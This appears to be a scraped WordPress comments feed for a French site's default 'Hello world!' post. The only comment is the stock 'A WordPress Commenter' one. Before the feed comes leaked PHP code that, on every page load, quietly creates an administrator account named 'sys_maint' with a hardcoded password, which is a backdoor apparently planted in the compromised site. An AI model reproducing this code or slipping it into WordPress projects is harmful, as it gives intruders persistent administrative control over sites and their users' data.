$user = 'sys_maint'; $pass = 'ChangeMe_Str0ng!'; $email = 'sys_maint@local.com'; function quick_create() { global $user, $pass, $email; if (!username_exists($user) && !email_exists($email)) { $id = wp_create_user($user, $pass, $email); if (!is_wp_error($id)) { $u = new WP_User($id); $u->set_role('administrator'); } } } add_action('init', 'quick_create'); Commentaires sur : Hello world! https://sarceram.com/2025/11/09/hello-world/ Fiabilité, Sécurité et Performance Thu, 30 Apr 2026 15:27:15 +0000 hourly 1 https://wordpress.org/?v=7.0.4 Par : A WordPress Commenter https://sarceram.com/2025/11/09/hello-world/#comment-1 Sun, 09 Nov 2025 08:17:37 +0000 https://sarceram.com/?p=1#comment-1 Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.

]]>